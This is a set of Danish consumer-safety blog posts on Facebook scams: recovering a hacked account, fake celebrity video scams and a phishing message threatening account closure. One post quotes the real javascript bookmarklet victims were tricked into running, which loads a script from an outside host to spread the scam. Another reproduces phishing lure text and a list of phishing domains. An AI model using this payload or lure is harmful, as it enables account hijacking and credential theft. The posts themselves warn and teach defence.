Facebook Guides

Hvis du har været så uheldig at få din facebook konto hacket, er der nogle ting du kan gøre for at få din konto, og dermed dit “facebook-liv”, tilbage.

1. Kræv din konto tilbage.

Er din konto blevet hacked er du bedst tjent med at besøge Facebook Hjælp og forsøge at kræve din konto tilbage.

Du finder mere information om at holde din konto sikker i Facebook Faq.

2. Ændre dine kodeord.

Hackeren har på en eller anden måde fået adgang til din emailadresse og dit kodeord, derfor skal du ændre kodeordet til din emailadresse og facebook øjeblikkeligt. Hvis du bruger det samme kodeord til andre ting, som f.eks. netbank osv. så skal du naturligvis ændre disse også.

3. Scan din computer.

Det er muligt at hackeren har fået adgang til din computer via en virus eller anden malware. Sørg for at have et opdateret anti-virus program installeret på din computer (har du ikke det kan AVG anbefales). Scan din computer grundigt (ikke bare et quick-scan). Hvis du har været logget på Facebook fra en anden computer, så fortæl ejeren af denne om angrebet.
Det er også en god idé at gennemgå de applikationer du evt. har godkendt og givet diverse tilladelser på Facebook, i sær hvis du hører til dem som sjældent læser applikationernes betingelser nærmere.
Fjern de applikationer du finder mistænkelige.

Hvis du finder applikationer eller udvidelser der ser mistænkelige ud og fjerner dem, så husk at ændre dit kodeord igen bagefter, ellers kan du ikke vide dig sikker på om dit nye kodeord også er blevet kompromitteret.

4. Giv familie og venner besked.

Det kan være flovt og ydmygende at indse at man er blevet hacket, men man bør ikke lade det afskrække en fra at fortælle andre om det.
Hvis din konto er hacked, kan hackeren bruge den til at sende familie og venner links til sider med malware og/eller forsøge at fiske personlige informationer fra dem, bedre kendt som phishing. (Læs også artiklen “Pas på phishing på Facebook”).

Når du fortæller familie og venner om truslen hjælper du dem til at undgå evt. selv at blive hacket af den samme hacker som du er blevet hacket af.

For ikke så længe siden annoncerede Facebook “Betroede Venner” funktionen. Funktionen giver mulighed for at dine betroede venner kan hjælpe dig med at kræve din konto tilbage, hvis den er blevet hacket. Hvis du endnu ikke kan benytte funktionen, vil du kunne det snarest, så tjek det igen om kort tid.

Undgå at gå i panik og tag det roligt, hurtig reaktion fra din side kan hjælpe til at begrænse skaden, og sikre at familie og venner ikke havner i samme situation som du er havnet i.

Med venlig hilsen

Jan Erikssøn

Sådan en video er der mange der gerne ville have set, men det er svindel. Fup og fidus.

Typiske Bieberfans, eller de som måske bare ville nyde at han blev ydmyget med en sex video på Facebook, ville nok ikke tænke sig om to gange før de klikkede på et link lignende dette:

Hvad sker der hvis jeg klikker på linket?

For dem som klikker på linket venter der en overraskelse, lidt i stil med den overraskelse man kunne læse om i artiklen “Rihanna video spreder sig hurtigt – Facebook Svindelnummer “, som jeg skrev 9. november 2011.

Man bliver ført til en tredje-parts hjemmeside, og hov.. hvad er nu det?? Ja, der sker så det at man skal dele videoen før man overhovedet kan se den.
Det er en meget typisk metode som bagmændene, til svindelnumre som dette, benytter sig af. De sikrer sig først og fremmest at videoen spredes til andre brugere, og det sikrer bagmændene større indtjening på svindleriet.

Du føres bag lyset!

Sagen er den, at efter videoen så er blevet delt, bliver du taget videre til en online undersøgelse, og det er disse undersøgelser bagmændene tjener på. Med andre ord tjener de penge på at føre folk bag lyset.
Det er der desværre ikke noget nyt i, og der er heller ikke noget nyt i at en kendt får misbrugt sit navn på den her måde.

Hvis du nu alligevel er blandt de uheldige der har ladet sig narre til at dele linket med dine venner, så sørg for at få det slettet igen på din Nyhedsside. Du kan også vælge at anmelde linket som spam, og det vil jeg stærkt anbefale at man gør, så andre ikke risikere at falde i samme fælde.

“Jamen at jeg lille menneske anmelder det til Facebook sker der da ingenting ved??” – jo, det gør der, det kræver at tilpas mange brugere anmelder det, og du kan altid gøre dit for at alle bække små.. osv. Første skridt er i hvert fald at få gjort Facebook opmærksom på at svindlen finder sted.

Vil du holdes opdateret?

Hvis du gerne vil være på forkant med hvad du skal være opmærksom på af virus og svindelnumre på Facebook, og i øvrigt gerne vil lære mere om Facebook end du måske ved i forvejen, så hold øje med Facebookguides.dk!

En effektiv måde at gøre det på er ved at “synes godt om” siden på Facebook, hvor den har navnet Fjæsbogguides: http://www.facebook.com/Fjaesbogguides

Med venlig hilsen

Jan Erikssøn

“You will hate Rhianna after watching this video“

Sådan er titlen på et nyt svindelnummer der lige nu spreder sig med lynets hast på Facebook. Hvad? Går det virkelig så stærkt da?

Ja det gør det faktisk, alene den sidste time er der ca. 6000 flere brugere som har valgt at synes godt om dette, og dermed delt det med deres venner, som så deler det med deres venner osv. osv. Det spreder sig som en virus, fordi det er en type Facebook virus. Den spreder sig med ca. 100 brugere i sekundet!

Det drejer sig om en falsk video, og opslaget ligner sørme også et typisk video opslag. I virkeligheden er “videoen” slet ikke en video, men et link til en falsk Facebook side. “Video”-opslaget ser typisk sådan her ud (det kan variere):

Selve titlen på opslaget har udelukkende formålet, at vække brugernes nysgerrighed og derved få folk til at klikke sig ind på siden. Er der virkelig så mange der er nysgerrige og som slet ikke tænker sig om før de klikker på sådan noget her? JA! Desværre, men ja det er der, og der er rigtig rigtig mange.

Når man kommer ind på siden der linkes til møder man angiveligt en video (Her er det bare et billede):

Men hovsa, hvad nu? Der sker så det at man angiveligt bliver bedt om at bekræfte at man er over 18 år gammel. (Bemærk youtube ikonet på ovenstående billede, det næste billede herunder er også youtube-lignende. Der er altså bare lige den lille detalje, at der ikke ligger en video på youtube med titlen “You will hate Rhianna after watching this video”).

Nå men tilbage til bekræftelsen af at man er 18 eller derover, billedet ser nu sådan her ud:

Knappen med teksten “Continue” (Fortsæt) fører så videre til en lille instruktion, og det er her der er fare på færde! Instruktionen man får ser ud som på næste billede:

Hvis man gør sådan som instruktionen ligger op til, så har man altså inviteret balladen indenfor. Simpelthen fordi man udfører et lille javascript i sin adressebar som ligger skjult på siden.

Jeg vil ikke gå i dybden med hvordan svindelnummeret er lavet og hvilken kode der skal til for at sætte en falsk side op som denne, men jeg kan godt uden at kompromittere nogens sikkerhed gengive det lille javascript man forsøges at blive snydt til at udføre i sin browser. Der er tale om denne lille snip:

javascript:(a=(b=document).createElement(‘script’)).src=’http://citycash.tk//a.js’,b.body.appendChild(a);void(0)

Det der sker hvis man udfører javascriptet i sin browser er, at det falske opslag bliver slået op på alle dine venners vægge, og på deres venners vægge, deres venners venners vægge osv. osv. osv. og det er derfor den spreder sig så lynhurtigt.

Man bliver så bedt om at dele videoen, endda før man kan se den, og hvordan det kan være man overhovedet vil dele noget som helst man ikke aner en flyvende fis af hvad er, dét er mig i sandhed en gåde af dimensioner.

Efter delingen når man ind til sagens kerne, det der er motivationen for overhovedet at producere et svindelnummer som dette, for man udsættes så for en online undersøgelse man skal svare på, og det er dét svindlerne tjener på. Vupti, man er blevet taget ved næsen og en eller flere svindlere tjener kassen på nummeret.

WOW! Endelig får man så videoen at se, for ja der er faktisk en video, men indholdet af den er langt fra det man ellers forventede set ud fra det falske video billede i opslaget man klikkede sig ind på.

Men kære læser, du skal da ikke snydes for lige at se Rihanna i en nedringet kjole, og i et andet klip i hvad der ligner en bikini-top, og shorts, så her er videoen der bruges som lokkemad:

Rihanna\’s sexy revealing Dress!!

Hvad så nu?!

Jeg tillader mig at foreslå at man sletter opslaget hvis man er så uheldig at have det på sin væg, at man deler denne artikel med sine venner, og at vi sammen hjælper hinanden med at mane den her plage til jorden. Så husk enten at klikke “like” eller “share” her på siden, på forhånd tak, og også tak fordi du valgte at besøge facebookguides.dk

Med venlig hilsen

Jan Erikssøn

Facebook gør meget for at holde siden sikker, men det betyder ikke at man kan læne sig tilbage med en god kop kaffe og regne med at man ikke selv behøver at være opmærksom.

Der florerer mange lyssky ting på Facebook, og en af dem er et phishing svindelnummer som jeg vil fortælle om i denne artikel.

En person på min venneliste på facebook blev netop udsat for et phishing-forsøg så sent som i dag.
Man får typisk tilsendt en tekst svarende til nedenstående:

WARNING : Your account is reported to have violated the policies that are considered annoying
or insulting Facebook users. Until we (http://www.facebook.com/security) system will disable your
account within 24 hours if you do not do the reconfirmation.

If you still want to use Facebook, Please confirm your account below:

confirm-your-account-security.tk/

Thanks.

The Facebook Team

Det ser jo umiddelbart ud som en advarsel fra Facebook’s sikkerheds team om at man risikerer at få lukket sin profil om 24 timer. Det i sig selv bør få alarmklokkerne til at ringe, for det er ikke normal procedure hvis man får lukket sin konto midlertidigt pga. spam eller chikane m.m.
Den lukkes simpelthen bare uden varsel. Facebook sender aldrig et varsel ud om lukning af ens konto.

Det .tk link der er i eksemplet her over fører til en falsk facebookside. Netop linket dertil findes i flere udgaver, her er nogle af dem (lad være med at besøge nogen af dem!):

• http://confirm-your-account-security.tk/

  http://confirm_security_account.uiwap.com/

  http://check-point-facebook-identity-account-confirmation.tk/

  http://facebook-help-users.at.hm/

  http://secure-confirmation-your-account-facebook.tk/

  http://security-warning-help.at.hm/

  http://secure-your-account-center-facebook.tk/

  http://facebook-secure-center-your-account.tk/

Det er blot nogle af de links der har været anvendt, der er mange flere af lignende art.

Som sagt skal man ikke besøge nogle af linkene, eller et link man selv får tilsendt hvis man er uheldig at blive udsat for et lignende phishing-forsøg.

Det man typisk møder er en side som ser sådan her ud:

Bemærk de to røde pile på billedet. Angiver du kodeordet til din mailadresse og dit kortnummer, så har du inviteret problemerne indenfor og faktisk givet begge dele videre til den person der står for phishing-forsøget.

For at indgyde falsk tryghed hos den besøgende på siden er den udstyret med dette under ovenstående:

Det utrænede øje vil uden videre tro at siden har med Facebook at gøre og give sig til at udfylde de ting der efterspørges, for man vil jo gerne undgå at få sin brugerkonto lukket i 24 timer.

Hvad kan man gøre?

Man kan ikke ændre i sine indstillinger for at sikre sig at man ikke modtager disse phishing-forsøg pr. email eller i beskeder på Facebook, men man kan gøre Facebook opmærksom på den falske email/besked, og til det har Facebook en formular der ligger på dette link:

https://www.facebook.com/help/contact.php?show_form=falsefacebooknotifications

I formularen kopierer man emailen/beskeden’s tekst ind i det ene felt, og øvrige oplysninger som hvornår den er sendt m.m. i det andet felt.

For at undgå at blive udsat for phishing er det vigtigt at være vågen. Tjek altid om et link fører til en side på facebook.com domænet, når det har med Facebook at gøre. Fører linket til andre domæner skal den røde lampe inde i hovedet blinke, og man skal lade være med at klikke på linket.

Sidste råd for denne gang:

Hvis et link/video på Facebook ser ud til at være for godt til at være sandt, så er det som regel svindel!

Med venlig hilsen

Jan Erikssøn